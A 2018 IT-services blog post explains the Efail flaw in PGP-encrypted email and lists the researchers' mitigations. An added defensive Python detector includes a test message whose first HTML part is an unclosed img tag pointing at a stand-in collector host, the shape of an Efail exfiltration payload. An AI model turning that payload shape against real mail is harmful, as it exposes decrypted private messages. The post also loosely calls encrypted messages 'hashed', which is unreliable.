Encrypted Email Security Flaw

Category: Blog, Security  |  Tuesday, May 15th, 2018

Think your business is safe because your emails are encrypted? Maybe not. A security flaw within email encryption looks like it has left a small opening for hackers to read your private messages.

Called Efail by European researchers, the vulnerability doesn’t break email encryption standards like Pretty Good Privacy (PGP), but exploits a flaw in how email clients read HTML code. While encrypted email keeps your messages secret, email clients see HTML content (for example, images or hyperlinks) and translate it into plain text, even if there is encrypted content in it. The security flaw allows potential hackers to use that element to expose messages protected by the most popular email encryption standards, the researchers said.

Sebastian Schinzel, the lead researcher on Efail and a professor of computer security at Münster University of Applied Sciences, said on Twitter that there were “currently no reliable fixes for the vulnerability.”

Fortunately, it’s not an easy hack. The vulnerability requires several steps for an attacker to intercept encrypted emails, but reveals a crack in PGP’s armor. The attacker would have to have access to the encrypted emails to begin with, meaning that the victim’s account would need to be compromised as a starting point.

They then would have to send the contents of that encrypted email back to its owner, the victim, in a carefully crafted way to make email clients think it’s HTML. This needs to be done in three emails, with the first one opening the HTML tag, the second one containing the encrypted message, and the third closing the HTML tag. This alone would be a social engineering con of great magnitude, although it’s never wise to underestimate the skills of a dedicated hacker.

So clients like Apple Mail, iOS Mail and Mozilla Thunderbird would view the emails as HTML instead of an encrypted message, and display it as one plaintext email instead of three hashed messages.
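The message shape described above can be checked for on the receiving side. The following is an added example, not code from the original post or from the Efail researchers: a Python check that flags mail in which PGP ciphertext directly follows HTML that ends inside an unclosed tag. The function names, the sample message and the `collector.example.invalid` host are constructed for illustration.

```python
import re
from email import message_from_string

PGP_ARMOR = "-----BEGIN PGP MESSAGE-----"
# HTML that ends inside a tag: a '<name...' with no closing '>' after it.
OPEN_TAG_AT_END = re.compile(r"<[a-zA-Z][^>]*$")

def leaf_parts(msg):
    """Yield (content_type, text) for every non-container MIME part, in order."""
    for part in msg.walk():
        if not part.is_multipart():
            payload = part.get_payload(decode=True) or b""
            yield part.get_content_type(), payload.decode("utf-8", "replace")

def find_wrapped_ciphertext(raw):
    """Flag PGP ciphertext that directly follows HTML left open mid-tag."""
    findings, prev_html = [], ""
    for ctype, text in leaf_parts(message_from_string(raw)):
        idx = text.find(PGP_ARMOR)
        if idx != -1:
            # HTML immediately before the armor: the previous part plus, for an
            # HTML part, whatever precedes the armor inside the same part.
            context = prev_html + (text[:idx] if ctype == "text/html" else "")
            if OPEN_TAG_AT_END.search(context.rstrip()):
                findings.append(f"{ctype} ciphertext follows an unclosed HTML tag")
        prev_html = text if ctype == "text/html" else ""
    return findings

def sample(first_html):
    """Constructed three-part message; the ciphertext body is a placeholder."""
    b = "BOUNDARY"
    parts = [("text/html", first_html),
             ("text/plain", PGP_ARMOR + "\n\n(placeholder)\n-----END PGP MESSAGE-----"),
             ("text/html", '">')]
    body = "".join(f"--{b}\nContent-Type: {t}\n\n{p}\n" for t, p in parts)
    return (f'MIME-Version: 1.0\nContent-Type: multipart/mixed; boundary="{b}"\n\n'
            f"{body}--{b}--\n")

if __name__ == "__main__":
    # Constructed inputs: one with the first HTML part left open, one benign.
    print(find_wrapped_ciphertext(sample('<img src="http://collector.example.invalid/')))
    print(find_wrapped_ciphertext(sample("<p>Forwarding the encrypted note.</p>")))
```

A hit here is a reason to quarantine or to force plain-text rendering for that message; it does not replace disabling HTML rendering in the client.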

“It’s a lot of steps for sure, and one that honestly is more hypothetical than it is dangerous,” Dave Kennedy, the chief executive at security company TrustedSec, said.

The attack works for archived encrypted emails as well, not just recent messages.

The researchers recommend:

  • Disabling HTML rendering in your email client to prevent your PGP messages from being decrypted.
  • Temporarily stopping the use of PGP email plugins, and using non-email based platforms for encrypted messages.

If you need assistance with managed IT security services for your business, give EnhancedTECH a call at 714-970-9330.

Samantha Keller

Director of Marketing and PR at EnhancedTECH
Samantha Keller (AKA Sam) is a published author, tech-blogger, event-planner and mother of three fabulous humans. Samantha has worked in the IT field for the last fifteen years, intertwining a freelance writing career along with technology sales, events and marketing. She began working for EnhancedTECH ten years ago after earning her Bachelor’s degree from UCLA and attending Fuller Seminary. She is a lover of kickboxing, extra-strong coffee, and Wolfpack football. Her regular blog columns feature upcoming tech trends, cybersecurity tips, and practical solutions geared towards enhancing your business through technology.